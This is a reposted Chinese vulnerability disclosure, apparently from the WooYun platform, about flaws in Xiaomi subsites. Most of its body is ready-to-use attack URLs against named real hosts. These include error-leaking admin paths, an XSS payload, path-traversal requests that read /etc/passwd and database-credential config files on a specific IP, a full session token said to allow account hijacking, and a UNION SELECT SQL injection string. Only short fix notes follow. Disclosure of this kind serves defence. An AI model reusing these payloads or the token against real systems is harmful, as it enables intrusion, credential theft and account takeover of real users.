网站地图    收藏   

主页 > 后端 > 网站安全 >

小米科技网站群(子站)漏洞集锦 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 1:网站+论坛的错误信息泄露2:跨站攻击3:任意文件下载4:会话管理隐患后续有新发现会继续更新。漏洞证明:1:网站+论坛的错误信息泄露http://res.api.miui.com/index.phphttp://bbs.xiaomi.com/uc_se...

1:网站+论坛的错误信息泄露
 2:跨站攻击
 3:任意文件下载
 4:会话管理隐患
 后续有新发现会继续更新。
 
漏洞证明:
 
1:网站+论坛的错误信息泄露
 http://res.api.miui.com/index.php
 http://bbs.xiaomi.com/uc_server/control/admin/db.php
 http://bbs.miliao.com/uc_server/control/admin/db.php
 http://ucenter.miui.com/uc_server/control/admin/db.php
 http://www.xiaomigongshe.com/wp-admin/includes/admin.php
 http://resource.xiaomi.net/
 
 
 




 
 
 
 
 
 
 
 
2:跨站攻击
 munion.xiaomi.com/index.php?mod=<iframe src=//>
 
 3:任意文件下载
 http://180.186.32.249/web/common/getfile.jsp?p=/../../../../../etc/passwd
 http://180.186.32.249/web/common/getfile.jsp?p=/../../../../../opt/uficc/web/admin/login.jsp
 http://180.186.32.249/web/common/getfile.jsp?p=/../../../../../opt/uficc/icc_config/Proxool.properties
 
 
 


 
 
 
 
 
 
 
 
 
 
 
数据库帐号密码
 
 
 
 
 
4:会话管理隐患
 
http://order.xiaomi.com/site/callback?referer=http%3A%2F%2Fwww.xiaomi.com%2F&token=S8yHMDpLJ0Lc432m%2BJAQm5eNQxFBlRS7MbwAUj4KKM167uPKTdiZOfg0%2F1H05maHjIvK0PF1ddFL%2B2oWju0Y1z0MNNfWO0DkMw0rloN%2FCGPUNx32vPCtZdpiY8ipQJsqku3cYSBn6IjHNbbahQvHCktF%2BFtTRew3gFE1se%2BfyVLIquEbGayAlk8ZLlfF2QCOZcnTTzhLoZIWltApcgkcL01uY84SYzYn29iczPjsWuE%3D
 
 
在任意第三方获取token后可劫持该帐号,且不论该帐号修改了密码均可劫持帐户,并没有时间限制(同时未进行二次会话验证,),只要一个token在手,实时有效。
 
修复方案:

修复方案:
1:关闭php错误信息显示

2:过滤非法敏感参数
3:可以使用服务器的用户权限来解决。

作者 猪哥靓@乌云


第二部分:

1、某分站SQL注射点
http://tg.miliao.com/index.php?action=member-register&act=getSchool&province_id=101%20and%201=2%20union%20select%201,2,TABLE_NAME,4%20from%20INFORMATION_SCHEMA.TABLES--

2、Miui 某注入BUG
http://www.miui.com/extra.php?mod=themevote/stat&tpp=1/*!select*/&page=2
此定义为BUG,因为暂没发现可以利用的方法。




修复方案:加强防注

作者 Jannock

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论